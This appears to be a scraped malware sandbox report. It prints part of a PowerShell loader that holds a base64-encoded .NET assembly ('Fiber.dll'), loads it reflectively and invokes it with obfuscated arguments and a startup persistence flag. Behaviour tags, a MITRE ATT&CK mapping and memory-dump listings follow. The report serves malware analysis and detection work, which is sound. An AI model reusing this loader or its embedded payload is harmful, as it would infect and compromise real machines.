x1ZQBhZGRfUmVzb3VyY2VSZXNvbHZlAGdldF9TaXplAGJ1ZmZlclNpemUAU2l6ZU9mAHN0YXJ0dXBfcmVnAE5ld0xhdGVCaW5kaW5nAHNldF9FbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcARG93bmxvYWRTdHJpbmcAQ29tcGFyZVN0cmluZwBUb1N0cmluZwBSZWZyZXNoAEdldEZ1bGxQYXRoAEdldEZvbGRlclBhdGgAbGVuZ3RoAEFzeW5jQ2FsbGJhY2sARGVsZWdhdGVDYWxsYmFjawBNYXJzaGFsAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABMYXRlQ2FsbABGaWJlci5kbGwAS2lsbABzZXRfU2VjdXJpdHlQcm90b2NvbABHZXRNYW5pZmVzdFJlc291cmNlU3RyZWFtAERlZmxhdGVTdHJlYW0AQ3J5cHRvU3RyZWFtAE1lbW9yeVN0cmVhbQBTeXN0ZW0AU3ltbWV0cmljQWxnb3JpdGhtAFJhbmRvbQBJQ3J5cHRvVHJhbnNmb3JtAEJvb2xlYW4AYnl0ZXNXcml0dGVuAEFwcERvbWFpbgBnZXRfQ3VycmVudERvbWFpbgBHZXRGaWxlTmFtZVdpdGhvdXRFeHRlbnNpb24AVmVyc2lvbgBTeXN0ZW0uSU8uQ29tcHJlc3Npb24AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AcHJvY2Vzc0luZm9ybWF0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBJbnRlcm4AQ29weVRvAEZpbGVJbmZvAEN1bHR1cmVJbmZvAEZpbGVTeXN0ZW1JbmZvAHN0YXJ0dXBJbmZvAHNldF9TdGFydEluZm8AUHJvY2Vzc1N0YXJ0SW5mbwBEaXJlY3RvcnlJbmZvAFplcm8Ac3RhcnR1cABTeXN0ZW0uTGlucQBGaWJlcgBERVNDcnlwdG9TZXJ2aWNlUHJvdmlkZXIAU3BlY2lhbEZvbGRlcgBCdWZmZXIAYnVmZmVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBSZXNvbHZlRXZlbnRIYW5kbGVyAGdldF9Vc2VyAEN1cnJlbnRVc2VyAFRvR2VuZXJpY1BhcmFtZXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBCaXRDb252ZXJ0ZXIAZ2V0X0NvbXB1dGVyAE15Q29tcHV0ZXIAQ2xlYXJQcm9qZWN0RXJyb3IAU2V0UHJvamVjdEVycm9yAEFjdGl2YXRvcgAuY3RvcgAuY2N0b3IAQ3JlYXRlRGVjcnlwdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBGaWJlci5NeS5SZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAaW5oZXJpdEhhbmRsZXMAR2V0RmlsZXMAR2V0TWFuaWZlc3RSZXNvdXJjZU5hbWVzAEdldFZhbHVlTmFtZXMAdGhyZWFkQXR0cmlidXRlcwBwcm9jZXNzQXR0cmlidXRlcwBHZXRCeXRlcwBjcmVhdGlvbkZsYWdzAFN0cmluZ3MAZ2V0X1NldHRpbmdzAE15U2V0dGluZ3MAUmVzb2x2ZUV2ZW50QXJncwBSZWZlcmVuY2VFcXVhbHMAVG9vbHMAQ29udGFpbnMAQ29udmVyc2lvbnMAUnVudGltZUhlbHBlcnMAT3BlcmF0b3JzAGhQcm9jZXNzAHByb2Nlc3MAR2V0UHJvY0FkZHJlc3MAYmFzZUFkZHJlc3MAYWRkcmVzcwBzZXRfQXJndW1lbnRzAEV4aXN0cwBDb25jYXQARm9ybWF0AENyZWF0ZU9iamVjdABSZWxlYXNlQ29tT2JqZWN0AE15UHJvamVjdABwcm90ZWN0AE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AAAAAAAAAAAAAAAABgAAAMAAAALDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.zjn4*●*☞#:▶sr∞*▲◀(fom4*●*☞#:▶w∞*▲◀(n4*●*☞#:▶47.05.3](∞ú((úø(@@*ú.](∞ú(94*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1No1me_Startup','2'))
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:916

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/916-58-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/916-59-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/916-60-0x000000001B350000-0x000000001B632000-memory.dmp

Filesize
2.9MB

Download
memory/916-61-0x0000000002220000-0x0000000002228000-memory.dmp

Filesize
32KB

Download
memory/916-62-0x00000000029B0000-0x00000000029BC000-memory.dmp

Filesize
48KB

Download
memory/916-63-0x0000000002554000-0x0000000002557000-memory.dmp

Filesize
12KB

Download
memory/916-64-0x000000000255B000-0x0000000002592000-memory.dmp

Filesize
220KB

Download

Analysis

Sharing